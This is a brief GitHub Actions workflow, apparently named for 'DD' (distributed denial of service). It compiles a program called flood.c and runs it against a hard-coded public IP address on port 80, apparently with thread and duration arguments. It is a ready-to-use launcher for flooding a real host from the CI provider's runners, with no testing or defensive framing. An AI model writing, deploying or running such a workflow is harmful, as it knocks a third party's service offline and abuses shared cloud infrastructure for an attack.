name: dd
on: workflow_dispatch
jobs:
  dd:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v6
      - run: gcc -O3 -flto -march=native -pthread -o flood flood.c
      - run: ./flood 142.171.195.145 80 4 500
